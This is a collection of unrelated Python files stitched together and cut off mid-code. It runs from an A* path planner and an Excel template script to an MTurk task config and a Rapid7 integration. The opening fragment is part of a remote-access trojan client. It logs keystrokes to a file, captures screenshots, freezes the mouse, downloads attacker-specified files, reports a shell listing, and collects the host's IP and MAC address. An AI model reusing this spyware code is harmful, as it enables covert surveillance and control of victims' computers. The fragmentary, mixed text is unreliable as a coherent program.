try:
for i in range(len(data_str)):
string_part = (data_str.split("\\r\\r\\n")[6:][i])
string_part = string_part.lstrip().rstrip()
if string_part != '' and string_part != ' ' and string_part != '"' and string_part != "'":
cont_tmp.append(string_part)
except IndexError as e:
#print(34)
pass
try:
for i in cont_tmp:
cont_lst += i + '\n'
except:
#print(35)
pass
return cont_lst
elif 'linux' in str(platform.platform()).lower():
try:
cont_lst = f'[@%HOST_SHELL%@]'
response = subprocess.getoutput('ls /bin && ls /opt')
# response = response.split('\\n')
cont_lst += str(response).replace("[", "");
time.sleep(2)
return cont_lst
except:
#print(36)
pass
else:
response = 'error'
return response
def start_streaming(self):
global status_strm
dir_path = os.path.dirname(os.path.realpath(__file__))
try:
# os.system(f'{dir_path}/vstrm.py')
status_strm = True
main()
except:
#print(37)
pass
def lock_screen(self):
self.lock_screen_status = True
while self.lock_screen_status:
pyautogui.moveTo(1, 1)
def windows_screenshot_stream(self, number):
try:
myScreenshot = pyautogui.screenshot()
myScreenshot.save(f'images/{number}.png')
except:
#print(38)
pass
def webget_file(self):
try:
with open('tmp_call', 'r') as tmpc:
command = tmpc.read()
os.remove('tmp_call')
command = command.replace('[@%WEBGET%@]', '')
command = command.replace('-webget', '').replace(' -f ', ',')
command = command.split(',')
url = command[0]
get_response = requests.get(url, stream=True)
file_name = url.split("/")[-1]
with open(command[1], 'wb') as f:
for chunk in get_response.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
f.close()
except:
#print(39)
try:
os.remove('tmp_call')
os.remove(command[1])
except:
#print(40)
pass
def webraw_file(self):
try:
with open('tmp_call', 'r') as tmpc:
command = tmpc.read()
os.remove('tmp_call')
command = command.replace('[@%WEBRAW%@]', '')
command = command.replace('-webraw', '').replace(' -f ', ',')
command = command.split(',')
url = command[0]
html = requests.get(url).content
with open(command[1], 'w') as f:
f.write(html.decode('utf-8'))
f.close
except:
#print(41)
try:
os.remove('tmp_call')
os.remove(command[1])
except:
#print(42)
pass
# @staticmethod
def kl_main(self):
while not self.stop_logging:
with Listener(on_press=self.writeLog) as l:
# l.join()
while True:
if self.stop_logging:
l.stop()
self.kl_unique = False
self.stop_logging = False
return
time.sleep(1)
keydata = str(key)
# @staticmethod
def writeLog(self, key):
keydata = str(key)
# print(self.stop_logging)
try:
with open('kl_log.txt', 'r') as create_f:
create_f.close()
except:
#print(43)
with open('kl_log.txt', 'w') as create_f:
create_f.close()
with open("kl_log.txt", "a") as f:
if 'Key.space' in keydata:
f.write(' ')
elif 'Key' in keydata:
return
# f.write(f'<{keydata}>')
else:
f.write(keydata.replace("'", ''))
@staticmethod
def crypt(msg, key):
command = str(msg)
command = bytes(command, encoding='utf8')
cipher_suite = Fernet(key)
encoded_text = cipher_suite.encrypt(command)
return encoded_text
@staticmethod
def crypt_file(msg, key):
cipher_suite = Fernet(key)
encoded_text = cipher_suite.encrypt(msg)
return encoded_text
@staticmethod
def decrypt(msg, key):
cipher_suite = Fernet(key)
decoded_text_f = cipher_suite.decrypt(msg)
return decoded_text_f
@staticmethod
def local_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
lip = s.getsockname()[0]
s.close()
return lip
@staticmethod
def external_ip_addr():
try:
exip = requests.get('https://www.myexternalip.com/raw').text
exip = str(exip).replace(' ', '')
except:
#print(44)
exip = 'None'
return exip
@staticmethod
def get_mac():
# mac_num = hex(uuid.getnode()).replace('0x', '').upper()
mac_num = hex(uuid.getnode()).replace('0x', '00').upper()
mac = '-'.join(mac_num[i: i + 2] for i in range(0, 11, 2))
return mac
if __name__ == '__main__':
client = Client()
client.__init__()
"""
|
from .cCollateralBugHandler import cCollateralBugHandler; |
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 1 20:58:36 2019
@author: Sneha
"""
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 26 13:26:27 2019
@author: Sneha
"""
import tkinter as tk
from tkinter import *
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import numpy as np
import matplotlib.pyplot as plt
import math
from collections import deque, namedtuple
import sys
from collections import defaultdict
from heapq import *
import matplotlib.animation as animation
from shapely.geometry import Point, Polygon
import time
title='Click point in map to select Initial/Final point.'
arr=[]
root= tk.Tk()
class Node:
def __init__(self, node, cost,x,y):
self.node = node
self.parent = None
self.x=x
self.y=y
self.cost = cost
# Print the tree
def PrintTree(self,ax):
if self.parent:
self.parent.PrintTree(ax)
ax.scatter(self.x,self.y,s=10,c='b')
init=[]
final=[]
resolution=1
radius=0
clearance=0
# we'll use infinity as a default distance to nodes.
inf = float('inf')
Edge = namedtuple('Edge', 'start, end, cost')
def onpick(event):
print(event.xdata,event.ydata)
global init,final,title
if(not(init)):
print('init')
init=[int(event.xdata),int(event.ydata)]
else:
print('final')
final=[int(event.xdata),int(event.ydata)]
title='Node Exploration'
return True
def updateMinMax(arr,minx,miny,maxx,maxy,d):
if(maxx>arr[2]):
# print('x max')
arr[2]=maxx+1+d
if(minx<arr[0]):
# print('x min')
arr[0]=minx-1-d
if(maxy>arr[3]):
# print('y max')
arr[3]=maxy+1+d
if(miny<arr[1]):
# print('y min')
arr[1]=miny-1-d
def pathAvailability(x,y,arr,pol,maxPx,minPx,maxPy,minPy):
"""
Box
"""
global radius,clearance,resolution
d=radius+clearance
if(((y-((112.5/resolution)+d))<=0) and ((x-((100/resolution)+d))<=0) and ((-y+((67.5/resolution)-d))<=0) and ((-x+((50/resolution)-d))<=0)):
maxBx=100
minBx=50
maxBy=112.5
minBy=67.5
updateMinMax(arr,minBx,minBy,maxBx,maxBy,d)
return 0
# xpolygon=[120,158, 165,188,168,145];
# % ypolygon=[55,51,89,51,14,14];
# % Line 2 with coordinates (125,56) and (150,15)
p2 = Point(x,y)
for i in pol:
coords = i
poly = Polygon(i)
inside2 = p2.within(poly)
if(inside2==True):
break
if(inside2==True):
updateMinMax(arr,minPx,minPy,maxPx,maxPy,d)
return 0
if((((math.pow((x-(140/resolution)),2)/math.pow(((15/resolution)+d),2))+(math.pow((y-(120/resolution)),2)/math.pow(((6/resolution)+d),2))-1)<=0)):
maxEx=140+15
minEx=140-15
maxEy=120+6
minEy=120-6
updateMinMax(arr,minEx,minEy,maxEx,maxEy,d)
return 0
if((((math.pow((x-(190/resolution)),2))+(math.pow((y-(130/resolution)),2))-(math.pow(((15/resolution)+d),2)))<=0)):
maxCx=190+15
minCx=190-15
maxCy=130+15
minCy=130-15
updateMinMax(arr,minCx,minCy,maxCx,maxCy,d)
return 0
else:
return 1
def make_edge(start, end, cost=1):
return Edge(start, end, cost)
def test(algo_type):
print(algo_type)
def sorting(vals):
print(vals)
return vals
def getKey(item):
return item[0]
def astar(graph,f,t,paths_to_goal,tempx,tempy,weightx,weighty,costw,final,pol):
path=[]
paths_to_goal=[]
count=-1
path=0
queue=[]
queue.append((tempx,tempy))
g = defaultdict(list)
q,seen,mins,queue= [(0,Node(f,0,tempx,tempy))],set(), {f: 0},[(0,f)]
nodes=[]
count=0
nodes.append(Node(f,0,tempx,tempy))
node=''
while (q and node!=t):
(cost1,node)=heappop(queue)
index= [i for ((c,y), i) in zip(q, range(len(q))) if node==y.node]
(cost,v1) = q.pop(index[0])
temp_trav(weightx,weighty,costw,final,graph,g,q,queue,nodes,v1,seen,mins,pol)
ans= [v for v in (nodes) if v.node == t]
print(ans)
if(len(ans)>0):
return nodes,ans[0]
else:
return 'Initial/Final Point in Obstacle!!',0
def animate(listPnts):
global title,root,final,init
fig = plt.Figure(figsize=(5,4), dpi=100)
ax = fig.add_subplot(111)
scatter = FigureCanvasTkAgg(fig, root)
scatter.get_tk_widget().pack(side=tk.LEFT, fill=tk.BOTH)
ax.fill([250,0,0,250],[150,150,0,0], color = (0,0,0))
for i in (listPnts):
ax.fill(i[0],i[1], color = i[2])
ax.legend()
ax.set_title(title);
ax.set_xlabel('X axis')
ax.set_ylabel('Y axis')
fig.canvas.mpl_connect('button_press_event',onpick)
tk.Label(root, text="Enter Coordinates").pack()
tk.Label(root, text="Initial point(comma separated x,y-no spaces)").pack()
initial=Entry(root)
if(init):
init_str=str(init[0])+' '+str(init[1])
initial.insert(0,init_str)
initial.pack()
tk.Label(root, text="Final point(comma separated x,y-no spaces)").pack()
final1=Entry(root)
if(final):
final_str=str(final[0])+' '+str(final[1])
final1.insert(0,final_str)
final1.pack()
tk.Button(root, text="Quit", command= lambda:quit(initial,final1)).pack()
root.mainloop()
return listPnts
xdata=[]
ydata=[]
def animated(i,nodes,node,test):
global xdata,ydata
t, y = i.x,i.y
xdata.append(t)
ydata.append(y)
xmin, xmax = ax.get_xlim()
if t >= xmax:
ax.set_xlim(xmin, 2*xmax)
ax.figure.canvas.draw()
line.set_data(xdata, ydata)
if(((nodes[len(nodes)-1].x) == i.x) and (nodes[len(nodes)-1].y == i.y)):
node.PrintTree(ax)
return line,
def quit(initial,final1):
global root,init,final,radius,resolution,clearance,arr
resolution=1
if(initial.get()):
if(len((initial.get()).split(','))==2):
x,y=(initial.get()).split(',')
if(x and y and (int(x)) and (int(y))):
init=[int(int(x)/resolution),int(int(y)/resolution)]
else:
root.quit()
root.destroy()
test=tk.Tk()
test.geometry('400x300')
label = Label(test, text= "Please enter valid Initial Point.")
label.pack()
test.mainloop()
else:
root.quit()
root.destroy()
test=tk.Tk()
test.geometry('400x300')
label = Label(test, text= "Please enter valid comma separated Initial Point.")
label.pack()
test.mainloop()
elif(init):
init=[int(init[0]/resolution),int(init[1]/resolution)]
else:
root.quit()
root.destroy()
test=tk.Tk()
test.geometry('400x300')
label = Label(test, text= "Please enter valid Initial Point.")
label.pack()
test.mainloop()
if(final1.get()):
if(len((final1.get()).split(','))==2):
x1,y1=(final1.get()).split(',')
if(x1 and y1 and (int(x1)) and (int(y1))):
final=[int(int(x1)/resolution),int(int(y1)/resolution)]
else:
root.quit()
root.destroy()
test=tk.Tk()
test.geometry('400x300')
label = Label(test, text= "Please enter valid Final Point.")
label.pack()
test.mainloop()
else:
root.quit()
root.destroy()
test=tk.Tk()
test.geometry('400x300')
label = Label(test, text= "Please enter valid comma separated Final Point.")
label.pack()
test.mainloop()
elif(final):
final=[int(final[0]/resolution),int(final[1]/resolution)]
else:
root.quit()
root.destroy()
test=tk.Tk()
test.geometry('400x300')
label = Label(test, text= "Please enter valid Final Point.")
label.pack()
test.mainloop()
radius=0
clearance=0
root.quit()
root.destroy()
minx = min(final[0],init[0])-1
miny = min(final[1],init[1])-1
maxx= max(final[0],init[0])+1
maxy= max(final[1],init[1])+1
arr=[minx,miny,maxx,maxy]
def temp_trav(weightx,weighty,cost,final,graph,g,q,queue,nodes,parent,seen,mins,pol):
global arr,maxPx,minPx,maxPy,minPy
flag=0
tempx=parent.x
tempy=parent.y
global radius,clearance,resolution
d=radius+clearance
minx = min(final[0],init[0])-1
miny = min(final[1],init[1])-1
maxx= max(final[0],init[0])+1
maxy= max(final[1],init[1])+1
for i in range(8):
x=tempx+weightx[i]
y=tempy+weighty[i]
costw=cost[i]
a=str(tempx)+' '+str(tempy)
b=str(x)+' '+str(y)
tup=(a,b,costw)
tupin=(b,a,costw)
if((tup not in graph) and (tupin not in graph) and (x>=0 and x<=((250/resolution)+radius) and y>=0 and y<=((150/resolution)+radius)) and (((x+d)<=(250/resolution)) and ((y+d)<=(150/resolution)) and ((x-d)>=(0/resolution)) and ((y-d)>=(0/resolution)))):
if(((pathAvailability(x,y,arr,pol,maxPx,minPx,maxPy,minPy))==1) and (x>=(arr[0]) and y>=(arr[1])) and ( x<=(arr[2]) and y<=(arr[3]) )):
graph.append(tup)
test.append((x,y))
if(b not in seen):
seen.add(b)
dis=np.sqrt(np.square((final[0])-(x)) + np.square((final[1])-(y)))
next = (costw+parent.cost+dis)
v2=(Node(b,(next),x,y))
v2.parent=parent
mins[b] = next
nodes.append(v2)
q.append((next,v2))
heappush(queue, (next, b))
else:
ans= [v for v in (nodes) if v.node == b]
# ans1= [i for i, v in (queue) if v == b]
prev = mins.get(b, None)
dis=np.sqrt(np.square((final[0])-(x)) + np.square((final[1])-(y)))
next = (costw+parent.cost+dis)
if prev is None or next < prev:
ans[0].parent=parent
mins[b] = next
ans[0].cost=next
# ans1[0]=next
else:
minx=arr[0]
miny=arr[1]
maxx=arr[2]
maxy=arr[3]
t = np.linspace(0, 2*np.pi, 100)
r = 15
n=190 #x-position of the center
m=130 #radius on the y-axis
u=140 #x-position of the center
v=120 #y-position of the center
a=15 #radius on the x-axis
b=6 #radius on the y-axis
p=n+r*np.cos(t)
q=m+r*np.sin(t)
r=u+a*np.cos(t)
s=v+b*np.sin(t)
x = [50, 100, 100, 50]
y = [112.5, 112.5, 67.5, 67.5]
px=[125,163,170,193,173,150]
py=[56,52,90,52,15,15]
fig, ax = plt.subplots()
ax.grid(color=(0,0,0), linestyle='-', linewidth=1)
test=[]
xs=[]
ys=[]
uboxx=[]
uboxy=[]
for i in range(4):
uboxx.append(x[i]+radius*np.cos(t))
uboxy.append(y[i]+radius*np.sin(t) )
upolx=[]
upoly=[]
for i in range(6):
upolx.append(px[i]+radius*np.cos(t))
upoly.append(py[i]+radius*np.sin(t) )
ucirx=[]
uciry=[]
for i in range(len(r)):
ucirx.append(p[i]+radius*np.cos(t))
uciry.append(q[i]+radius*np.sin(t))
uelpx=[]
uelpy=[]
for i in range(len(r)):
uelpx.append(r[i]+radius*np.cos(t))
uelpy.append(s[i]+radius*np.sin(t))
listPnts=animate([[uboxx, uboxy,'b'],[x, y,'r'],[upolx, upoly,'b'], [px, py,'r'],[ucirx, uciry,'b'],[p,q,'r'],[uelpx, uelpy,'b'],[r,s,'r']])
r = 15/resolution
n=190/resolution #x-position of the center
m=130/resolution #radius on the y-axis
u=140/resolution #x-position of the center
v=120/resolution #y-position of the center
a=15/resolution #radius on the x-axis
b=6/resolution #radius on the y-axis
#plt.gca().set_aspect('equal')
p=n+r*np.cos(t)
q=m+r*np.sin(t)
r=u+a*np.cos(t)
s=v+b*np.sin(t)
x = [50/resolution, 100/resolution, 100/resolution, 50/resolution]
y = [112.5/resolution, 112.5/resolution, 67.5/resolution, 67.5/resolution]
px=[125/resolution,163/resolution,170/resolution,193/resolution,173/resolution,150/resolution]
py=[56/resolution,52/resolution,90/resolution,52/resolution,15/resolution,15/resolution]
uboxx=[]
uboxy=[]
for i in range(4):
uboxx.append(x[i]+radius*np.cos(t))
uboxy.append(y[i]+radius*np.sin(t) )
upolx=[]
upoly=[]
in_x=[]
in_y=[]
for i in range(6):
temp_x=px[i]+radius*np.cos(t)
temp_y=py[i]+radius*np.sin(t)
for j in temp_x:
in_x.append(j)
for k in temp_y:
in_y.append(j)
upolx.append(temp_x)
upoly.append(temp_y)
ucirx=[]
uciry=[]
for i in range(len(r)):
ucirx.append(p[i]+radius*np.cos(t))
uciry.append(q[i]+radius*np.sin(t))
uelpx=[]
uelpy=[]
for i in range(len(r)):
uelpx.append(r[i]+radius*np.cos(t))
uelpy.append(s[i]+radius*np.sin(t))
ax.fill(uboxx, uboxy,'b')
ax.fill(x, y,'r')
testing=ax.fill(upolx, upoly,'b')
ax.fill(px, py,'r')
ax.fill(ucirx, uciry,'b')
ax.fill(p,q,'r')
ax.fill(uelpx, uelpy,'b')
ax.fill(r,s,'r')
xs=[]
ys=[]
k=0
pol=[]
for i in testing:
array=i.get_xy()
polygon_vertices=[]
for j in array:
polygon_vertices.append((j[0],j[1]))
pol.append(polygon_vertices)
maxPx=0
minPx=250
maxPy=0
minPy=150
for i in pol:
coords = i
poly = Polygon(i)
for j in i:
if(minPx>j[0]):
minPx=j[0]
if(maxPx<j[0]):
maxPx=j[0]
if(minPy>j[1]):
minPy=j[1]
if(maxPy<j[1]):
maxPy=j[1]
print(minPx,minPy,maxPx,maxPy)
obstacles=[[uboxx, uboxy],[upolx, upoly],[ucirx, uciry],[uelpx, uelpy]]
weightx=[0,1,1,1,0,-1,-1,-1]
weighty=[1,1,0,-1,-1,-1,0,1]
cost=[1,np.sqrt(2),1,np.sqrt(2),1,np.sqrt(2),1,np.sqrt(2)]
graph=[]
tempx=init[0]
tempy=init[1]
pathx=[]
pathy=[]
paths_to_goal=[]
plt.tick_params(axis='both', which='major', labelsize=9)
print("Processing.....")
if(init and final):
nodes,node=astar(graph,str(init[0])+' '+str(init[1]),
str(final[0])+' '+str(final[1]),paths_to_goal,tempx,tempy,weightx,weighty,cost,final,pol)
if(node==0):
test=tk.Tk()
test.geometry('400x300')
label = Label(test, text= nodes)
label.pack()
test.mainloop()
else:
listPnts=[[uboxx, uboxy,'b'],[x, y,'r'],[upolx, upoly,'b'], [px, py,'r'],[ucirx, uciry,'b'],[p,q,'r'],[uelpx, uelpy,'b'],[r,s,'r']]
test=tk.Tk()
fig = plt.Figure(figsize=(5,4), dpi=100)
ax = fig.add_subplot(111)
line, = ax.plot([], [], 'y.',lw=0.3, alpha=0.2)
ax.grid()
scatter = FigureCanvasTkAgg(fig, test)
scatter.get_tk_widget().pack(side=tk.LEFT, fill=tk.BOTH)
for i in (listPnts):
ax.fill(i[0],i[1], color = i[2])
ax.legend()
ax.grid(color=(0,0,0), linestyle='-', linewidth=1)
ax.set_title(title);
ax.set_xlabel('X axis')
ax.set_ylabel('Y axis')
ani = animation.FuncAnimation(fig, animated, nodes, fargs=(nodes, node,test), interval=10,repeat=False, blit=False)
test.mainloop()
else:
test=tk.Tk()
test.geometry('400x300')
label = Label(test, text= "Please check validity if Initial/Goal Coordinates, Resolution, Radius or Clearance.")
label.pack()
test.mainloop() |
#!/usr/bin/env python3
import pandas as pd
from xlsxwriter.utility import xl_cell_to_rowcol
template_name = 'background/Billing of Witzenmann.xlsx'
source = (
'A7:A15', 'A19:A21', 'A42:A44', 'B2:B11', 'C2:C13', 'D63:D84',
'E2:E168')
def dfg(df, ranges):
for dv_range in ranges:
cells = dv_range.split(':')
rowcol1 = xl_cell_to_rowcol(cells[0])
rowcol2 = xl_cell_to_rowcol(cells[1])
sub_df = df.iloc[rowcol1[0]-1:rowcol2[0], rowcol1[1]:rowcol2[1]+1]
yield sub_df
def extract(df, ranges=source):
sub_dfs = dfg(df, ranges)
result = next(sub_dfs)
for sub_df in sub_dfs:
result = result.combine_first(sub_df)
return result.reindex_like(df)
def main():
with pd.ExcelFile(template_name) as xls:
tdf = pd.read_excel(
xls, sheet_name='01 Multi-line policy Details')
cdf = pd.read_excel(xls, sheet_name='client code')
idf = pd.read_excel(xls, sheet_name='insurer code', header=[0, 1])
vdf = pd.read_excel(xls, sheet_name='RiskName', usecols='A:D,H',
nrows=167)
tdf = tdf[0 : 1]
tdf.columns = tdf.columns.str.strip()
tdf.iloc[0] = '0_0'
tdf.at[0, 'Premium VAT Rate'] = 0.06
tdf.at[0, 'Commission Rate'] = 0.15
tdf.at[0, 'Commission VAT Rate'] = 0.06
tdf.at[0, 'Premium (VAT Excluded)'] = '[=P2/(1+N2)]'
tdf.at[0, 'Premium VAT TAX'] = '[=P2-M2]'
tdf.at[0, 'Commission (VAT Excluded)'] = '[=U2/(1+S2)]'
tdf.at[0, 'Commission VAT TAX'] = '[=R2*S2]'
tdf.at[0, 'Commission Total Amount'] = '[=P2*Q2]'
tdf.at[0, 'Income Class'] = '9.Renewal'
tdf.at[0, 'Program Type'] = '3.Locally Admitted Policies'
tdf.at[0, 'Placement Executive'] = 'No PE involved'
tdf.at[0, 'Distribution Channel'] = '1. Open Market(Non Facility)'
cdf = cdf.dropna(how='all')
from configparser import ConfigParser
config = ConfigParser()
config.read('config.ini')
# client_pat = r'(?i)China|\bCo\b\.?|Company|Ltd\.?|Limited'
# cdf['Client Name'] = cdf['Client Name'].str.replace(client_pat, '###')
idf = idf['Insurer Listing'][['Client Number', 'Insurer Name']]
for key, pattern in config['standard'].items():
idf['Insurer Name'] = idf['Insurer Name'].str.replace(pattern, ' ')
cdf['Client Name'] = cdf['Client Name'].str.replace(pattern, ' ')
cdf.rename({'Client Name': 'Client Name (Full Name)'}, axis=1, inplace=True)
idf.rename({
'Client Number': 'Insurer Code',
'Insurer Name': 'Insurer Name (Full Name)'}, axis=1, inplace=True)
vdf = extract(vdf)
vdf.rename({'Risk Name1': 'Risk'}, axis=1, inplace=True)
with pd.ExcelWriter('test/template.xlsx', engine='xlsxwriter') as writer:
tdf.to_excel(writer, 'template', index=False)
cdf.to_excel(writer, 'Client Code', index=False)
idf.to_excel(writer, 'Insurer Code', index=False)
vdf.to_excel(writer, 'valid', index=False)
tdfsheet = writer.sheets['template']
tdfsheet.set_column('B:B', 15)
tdfsheet.set_column('C:D', 30)
tdfsheet.set_column('E:E', 15)
tdfsheet.set_column('F:F', 30)
tdfsheet.set_column('G:Y', 25)
import pandas as pd
sheet_names = ['Client Code', 'Insurer Code', 'valid']
def get_dataframe(filename):
with pd.ExcelFile(filename) as xls:
for sheet_name in sheet_names:
dataframe = pd.read_excel(xls, sheet_name=sheet_name)
yield dataframe
def compare_template():
old = get_dataframe('test/oldtemplate.xlsx')
new = get_dataframe('test/template.xlsx')
for old_data, new_data, name in zip(old, new, sheet_names):
print('%s equal: %s' % (name, old_data.equals(new_data)))
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
task_config = {}
"""A short and descriptive title about the kind of task the HIT contains.
On the Amazon Mechanical Turk web site, the HIT title appears in search results,
and everywhere the HIT is mentioned.
"""
task_config['hit_title'] = 'Comment on an Image'
"""A description includes detailed information about the kind of task the HIT contains.
On the Amazon Mechanical Turk web site, the HIT description appears in the expanded
view of search results, and in the HIT and assignment screens.
"""
task_config['hit_description'] = 'You will write an engaging comment for an image.'
"""One or more words or phrases that describe the HIT, separated by commas.
On MTurk website, these words are used in searches to find HITs.
"""
task_config['hit_keywords'] = 'comment'
"""A detailed task description that will be shown on the HIT task preview page
and on the left side of the chat page. Supports HTML formatting.
"""
task_config[
'task_description'
] = '''
<h2><b>Description</b></h2>
In this task, you will be shown 5 images, and will write a comment about each image.
The goal of this task is to write something about an image that someone else would
find engaging.
<br>
<br>
<h4><b>STEP 1</b></h4> With each new photo, you will be given a <b>personality trait</b>
that you will try to emulate in your comment. For example, you might be given
"<b>snarky</b>" or "<b>glamorous</b>". The personality describes
<em><b>YOU</b></em>, not the picture. It is <em>you</em> who is snarky or
glamorous, not the contents of the image.
<br>
<br>
<h4><b>STEP 2</b></h4> You will then be shown an image, for which you will write
a comment <em>in the context of your given personality trait</em>.
Please make sure your comment has at least <b>three words</b>. Note that these are
<em>comments</em>, not captions.
<br>
<br>
E.g., you may be shown an image of a tree. If you are "<b>snarky</b>",
you might write "What a boring tree, I bet it has bad wood;" or,
if you were "<b>glamorous</b>", you might write "What an absolutely beautiful tree!
I would put this in my living room it's so extravagent!"
<br>
<br>
NOTE: you will receive a new personality for each new image. Please do not
simply copy the personality into your comment, and <b>please try not to use
the text in the image when forming a comment</b>.
<br>
<br>
<h4><b>REWARD/BONUS</b></h4>
To complete this task, <b><span style="color:blue">you must comment on ALL 5 images.
</span></b>
If you complete the task, you will receive $0.46.
<br>
<br>
<br>
<h4><b>CLOSE WINDOW/TIMEOUT/RETURN HIT</b></h4>
Once the task has started, close window/timeout or return HIT will result in
<b><span style="color:blue">HIT EXPIRED</span></b> to you and NO reward paid.
<br>
<br>
<br>
<h4><b>IMPORTANT NOTICE</b></h4>
<span style="color:blue"><b>1. Be aware the comment you enter will be made public,
so write as you would e.g. on a public social network like Twitter.</b></span>
<br>
2. Please do not reference the task or MTurk itself in the comment. Additionally,
<b>please try not to use the text in the image when forming a comment</b>.
<br>
3. We will reject HITs that do not display any sense that you have looked at the
image while forming the comment. That is, if the comment has nothing to do with the
image, we will not accept it.
<br>
4. Likewise, we will reject HITs that do not display any sense that you have
looked at the personality while forming the comment.
<br>
5. Please do not comment anything that involves any level of discrimination,
racism, sexism and offensive religious/politics comments, otherwise
the submission will be rejected.
<br>
<br>
<br>
If you are ready, please click "Accept HIT" to start this task.
'''
|
import komand
from .schema import UpdateSiteExcludedTargetsInput, UpdateSiteExcludedTargetsOutput, Input
# Custom imports below
from komand_rapid7_insightvm.util import endpoints
from komand_rapid7_insightvm.util.resource_helper import ResourceHelper
class UpdateSiteExcludedTargets(komand.Action):
def __init__(self):
super(self.__class__, self).__init__(
name='update_site_excluded_targets',
description='Update an existing site scope of excluded ip address and hostname targets',
input=UpdateSiteExcludedTargetsInput(),
output=UpdateSiteExcludedTargetsOutput())
def run(self, params={}):
scope = params.get(Input.EXCLUDED_TARGETS)
resource_helper = ResourceHelper(self.connection.session, self.logger)
endpoint = endpoints.Site.site_excluded_targets(self.connection.console_url, params.get(Input.ID))
# Pull current site scope in order to append to list instead of overwriting
if not params.get(Input.OVERWRITE):
current_scope = resource_helper.resource_request(endpoint=endpoint,
method='get')
self.logger.info(f"Appending to current list of excluded targets")
scope.extend(current_scope['addresses'])
self.logger.info(f"Using {endpoint} ...")
response = resource_helper.resource_request(endpoint=endpoint,
method='put',
payload=scope)
return {
"id": params.get(Input.ID),
"links": response['links']
}
|
"""Constants."""
from typing import TypeVar
from .feed_entry import FeedEntry
from .filter_definition import GeoJsonFeedFilterDefinition
DEFAULT_REQUEST_TIMEOUT = 10
UPDATE_OK = "OK"
UPDATE_OK_NO_DATA = "OK_NO_DATA"
UPDATE_ERROR = "ERROR"
T_FILTER_DEFINITION = TypeVar("T_FILTER_DEFINITION", bound=GeoJsonFeedFilterDefinition)
T_FEED_ENTRY = TypeVar("T_FEED_ENTRY", bound=FeedEntry)
|
#!/usr/bin/env python
# coding: utf-8
# In[3]:
import lmdb
import sys
import numpy as np
from io import BytesIO
import numpy as np
#sys.path.append("/dvmm-filer2/projects/AIDA/alireza/tools/AIDA-Interchange-Format/python/aida_interchange")
from rdflib import URIRef
from rdflib.namespace import ClosedNamespace
from collections import defaultdict
import sys
import pickle
from collections import defaultdict
from pathlib import Path
from tqdm import tqdm as std_tqdm
import time
from sklearn.cluster import DBSCAN
import multiprocessing
start = time.time()
print("hello")
from sklearn.preprocessing import normalize
import cv2
from aida_interchange import aifutils
#import dbscan
from functools import partial
tqdm = partial(std_tqdm, dynamic_ncols=True)
parent_file = sys.argv[1]
az_obj_graph = sys.argv[2]
az_obj_jpg = sys.argv[3]
az_obj_kf = sys.argv[4]
ins_img_path = sys.argv[5]
ins_kf_path = sys.argv[6]
ere_link = sys.argv[7]
dataName = sys.argv[8]
Path(dataName).mkdir(parents=True, exist_ok=True)
#hmdb_file =
# In[2]:
child = defaultdict(list)
parent = {}
file5= open(parent_file)
i = 0
for line in file5:
i+=1
if i ==1:
continue
data = line.split('\t')
child[data[2]].append(data[3])
parent[data[3]] = data[2]
#print(parent)
# In[3]:
with open(az_obj_graph, 'rb') as handle:
(kb_dict, entity_dict, event_dict) = pickle.load(handle)
entity_dic2 = defaultdict(list)
for x,y in entity_dict.items():
data = x.split('/')
#print data
entity_dic2[data[-2]].append(data[-1])
#print(entity_dic2)
#for x,y in entity_dic2.items():
# print x,y[0]
# break
# In[4]:
with open(az_obj_jpg, 'rb') as handle:
OD_result = pickle.load(handle)
# In[5]:
"""
with open(az_obj_kf, 'rb') as handle:
ODF_result = pickle.load(handle)
# In[6]:
"""
parentDic = defaultdict(list)
#import caffe
#ins_img_path = "results/instance1"
ins_img_env = lmdb.open(ins_img_path, map_size=1e11, readonly=True, lock=False)
#print(ins_img_env)
ins_img_txn = ins_img_env.begin(write=False)
lmdb_cursor = ins_img_txn.cursor()
#datum = caffe.proto.caffe_pb2.Datum()
#"""
for key, value in lmdb_cursor:
#datum.ParseFromString(value)
#data = caffe.io.datum_to_array(datum)
value = np.frombuffer(value, dtype='float32').tolist()
#print(str(key))
key = key.decode()
data = str(key).split('/')
file_id = str(data[0])
num = data[1]
#print(file_id,num)
if num in entity_dic2[file_id]:
parentDic[parent[data[0]]].append((key,value))
#print(parentDic)
#"""
"""
ins_kf_env = lmdb.open(ins_kf_path, map_size=1e11, readonly=True, lock=False)
#print(ins_img_env)
ins_kf_txn = ins_kf_env.begin(write=False)
lmdb_cursor2 = ins_kf_txn.cursor()
#datum = caffe.proto.caffe_pb2.Datum()
for key, value in lmdb_cursor2:
#datum.ParseFromString(value)
#data = caffe.io.datum_to_array(datum)
value = np.frombuffer(value, dtype='float32').tolist()
#print(str(key))
key = key.decode()
data = str(key).split('/')
file_id = str(data[0])
num = data[1]
print(file_id,num)
if num in entity_dic2[file_id]:
parentDic[parent[data[0]]].append((key,value))
print(parentDic)
"""
# In[7]:
"""
# In[8]:
# In[9]:
file1 = open('results/frame_child_e.txt')
videoDic = {}
for line in file1:
data = line.split()
videoDic[data[1]] = data[0]
# In[10]:
"""
file1 = open(ere_link)
ere_type = {}
for line in file1:
data = line.split(',')
#print data
ere_type[data[0]] = data[1]
# In[11]:
images=0
i=0
typeList = ['Weapon','Vehicle','Person','Facility']
threshold = {'Person': 0.72, 'Vehicle': 0.7, 'Weapon': 0.7, 'Facility': 0.7}
count = 0
for x, y in tqdm(parentDic.items()):
#print x
count+=1
#if count < 40:
# continue
g = aifutils.make_graph()
#g = kb_dict[parent]
cu_pref = 'http://www.columbia.edu/AIDA/DVMM/'
sys_instance_matching = aifutils.make_system_with_uri(g, cu_pref+'Systems/Instance-Matching/ResNet152')
#entityList = []
entityList = defaultdict(list)
arrayList = defaultdict(list)
keyList = defaultdict(list)
#bb_list = []
first = 1
detected = 0
for i in range(len(y)):
(key, feature) = y[i]
#print key
detected+=1
#print detected
if '_' in key:
#print key
eid = "http://www.columbia.edu/AIDA/DVMM/Entities/ObjectDetection/RUN00010/Keyframe/"+key
#if eid in entity_dict.keys():
#continue
data = key.split('/')
#print ere_type[ODF_result[data[0]][int(data[1])]['label']]
